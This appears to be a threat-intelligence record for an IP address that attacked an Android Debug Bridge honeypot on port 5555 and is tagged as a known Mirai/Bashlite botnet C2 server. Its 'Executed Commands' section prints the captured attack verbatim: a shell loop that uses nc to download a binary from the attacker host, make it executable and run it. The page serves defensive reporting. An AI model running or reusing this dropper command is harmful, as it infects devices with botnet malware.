Active Threat • LOW

94.156.152.67

Country of Origin🇧🇬 BG

First Detection4/21/2026

Last Activity4/22/2026

ISPInternet Magnate (Pty) Ltd

🎯

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇧🇬 BG
City: Unknown
ASN: AS214209
ISP: Internet Magnate (Pty) Ltd

Attack Types

adb_honeypot

Attacked Ports

5555

Associated Malware

No associated malware

Executed Commands

for dir in /data/local/tmp /tmp /sdcard /mnt/sdcard /storage/emulated/0 /data/cache /dev/shm /data/local /cache; do cd $dir 2>/dev/null && (nc 94.156.152.67 8081 > flexoiu 2>/dev/null || nc -w 30 94.156.152.67 8081 > flexoiu 2>/dev/null || timeout 30 nc 94.156.152.67 8081 > flexoiu 2>/dev/null) && chmod 755 flexoiu && ./flexoiu && break; done

$getprop ro.product.device2x

ThreatFox Intelabuse.ch

⚠️KNOWN C2 SERVER

Malware Families

elf.miraielf.bashlite

Threat Types

botnet_cc

Confidence: 100%

Risk Assessment

/100

LowMediumHighCritical